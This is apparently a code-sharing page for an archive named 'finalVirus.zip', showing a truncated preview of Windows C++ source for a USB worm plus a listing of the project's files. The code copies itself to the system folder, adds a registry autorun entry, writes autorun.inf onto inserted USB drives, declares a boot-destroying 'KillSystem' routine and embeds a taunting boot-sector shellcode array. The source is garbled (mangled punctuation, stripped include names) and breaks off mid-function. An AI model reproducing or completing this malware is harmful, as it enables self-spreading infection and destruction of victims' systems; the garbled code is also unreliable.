finalVirus.zip

#include “stdafx.h“
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#pragma comment （lib“Advapi32.lib“）
#pragma comment（lib“shlwapi.lib“）
#pragma comment（lib“ComCtl32.lib“）
#pragma comment（lib“user32.lib“）
using namespace std;
#define TIMER 1//计时器
//function


BOOL GetTime（）;//获取当前时间
BOOL KillSystem（）;//破坏引导
string   sys_time;



LRESULT CALLBACK WndProc（HWND UINT WPARAM LPARAM）;//窗口过程
//获取盘符
TCHAR FirstDriveFromMask （ULONG unitmask）;
//病毒从U盘启动时用到的函数
BOOL FileExist（TCHAR *path）;//测试一个文件是否存在
BOOL GetSelfPath（TCHAR *path）;//Get the virus‘s path
//BOOL FindU（TCHAR *u）;//check whether u exist u[2]
BOOL GetSysPath（TCHAR *path）;//得到系统路径
BOOL CopyToSysAndSet（HWND hwnd）;//复制自身到系统目录和设置
BOOL SetFileAttrib（TCHAR *path）;//设置path所指文件的属性
BOOL RegAutoRun（TCHAR *path）;//修改注册表，实现自启动
//从C盘启动时用到函数
BOOL CopyToUAndSet（）;//复制自己到U盘
BOOL CreateAutoRunFile（TCHAR *path）;//在U盘下生成autorun.inf文件
BOOL FindSelf（）;//测试自己是否在已经执行了
//global variable
TCHAR szExePath[MAX_PATH];//the virus‘s path
TCHAR U[2];//保存U盘的盘符
TCHAR szSysPath[MAX_PATH];//system path
//constant



const TCHAR *szExeName=“bbbbb.exe“;
const TCHAR *szSysName=“aaaaa.exe“;
const TCHAR *szAutoRunFile=“AutoRun.inf“;


unsigned char scode[] =
“xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c“
“x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x76x69x72“
“x75x73x21x20x46x75x63x6bx20x79x6fx75x20x3ax2dx29“;

/************************************************************/
int WINAPI WinMain
（
HINSTANCE hInstance
HINSTANCE hPrevInstance
PSTR szCmdLine 
//LPSTR lpCmdLine
int iCmdShow
）
{
static TCHAR szAppName[]=TEXT （“UUUUUU“）;
HWND hwnd;
MSG msg;
WNDCLASS wndclass;
wndclass.style =0;
wndclass.lpfnWndProc =WndProc;
wndclass.cbClsExtra =0;
wndclass.cbWndExtra =0;
wndclass.hInstance =hInstance;
wndclass.hIcon =0;
wndclass.hCursor =0;
wndclass.hbrBackground =0;
wndclass.lpszMenuName =NULL;
wndclass.lpszClassName =szAppName;
if （!RegisterClass （&wndclass））
{
MessageBox （NULLTEXT（“Program requires Windows NT!“）
szAppName MB_IConerror）;
return 0;
}
hwnd = CreateWindow （szAppName NULL
WS_DISABLED
0 0
0 0
NULL NULL hInstance NULL）;
while （GetMessage（&msg NULL 0 0））
{
TranslateMessage （&msg）;
DispatchMessage （&msg）;
}
return msg.wParam;
}

/********************************************************/


LRESULT OnDeviceChange（HWND hwndWPARAM wParam LPARAM lParam）
{
PDEV_BROADCAST_HDR lpdb = （PDEV_BROADCAST_HDR）lParam;
switch（wParam）
{
case DBT_DEVICEARRIVAL: //插入
if （lpdb -> dbch_devicetype == DBT_DEVTYP_VOLUME）
{
PDEV_BROADCAST_VOLUME lpdbv = （PDEV_BROADCAST_VOLUME）lpdb;
U[0]=FirstDriveFromMask（lpdbv ->dbcv_unitmask）;//得到u盘盘符
//MessageBox（0U“Notice!“MB_OK）;
CopyToUAndSet（）;//拷到u盘
}
break;
case DBT_DEVICEREMOVECOMPLETE: //设备删除
break;
}
return LRESULT（）;
}


LRESU

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----
     目录           0  2018-12-17 14:42  ConsoleApplication5
     目录           0  2018-12-15 21:01  ConsoleApplication5ConsoleApplication5
     文件        8537  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5ConsoleApplication5.cpp
     文件        4693  2018-12-17 09:09  ConsoleApplication5ConsoleApplication5ConsoleApplication5.vcxproj
     文件        1323  2018-12-13 18:46  ConsoleApplication5ConsoleApplication5ConsoleApplication5.vcxproj.filters
     文件         164  2018-12-13 20:32  ConsoleApplication5ConsoleApplication5ConsoleApplication5.vcxproj.user
     目录           0  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debug
     文件       31920  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5DebugCL.read.1.tlog
     文件        1302  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5DebugCL.write.1.tlog
     文件        2513  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5DebugConsoleApplication5.Build.CppClean.log
     文件          84  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5DebugConsoleApplication5.lastbuildstate
     文件        2045  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5DebugConsoleApplication5.log
     文件      463153  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5DebugConsoleApplication5.obj
     文件     1310720  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5DebugConsoleApplication5.pch
     文件        1686  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debugcl.command.1.tlog
     文件           2  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink-cvtres.read.1.tlog
     文件           2  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink-cvtres.write.1.tlog
     文件           2  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink-mt.read.1.tlog
     文件           2  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink-mt.write.1.tlog
     文件           2  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink-rc.read.1.tlog
     文件           2  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink-rc.write.1.tlog
     文件        1568  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink.command.1.tlog
     文件        2768  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink.read.1.tlog
     文件         876  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debuglink.write.1.tlog
     文件       11553  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debugstdafx.obj
     文件      740352  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debugvc110.idb
     文件      487424  2018-12-17 14:42  ConsoleApplication5ConsoleApplication5Debugvc110.pdb
     文件        1594  2018-12-13 18:46  ConsoleApplication5ConsoleApplication5ReadMe.txt
     文件         224  2018-12-13 18:46  ConsoleApplication5ConsoleApplication5stdafx.cpp
     文件         233  2018-12-13 18:46  ConsoleApplication5ConsoleApplication5stdafx.h
     文件         236  2018-12-13 18:46  ConsoleApplication5ConsoleApplication5 argetver.h
............此处省略12个文件信息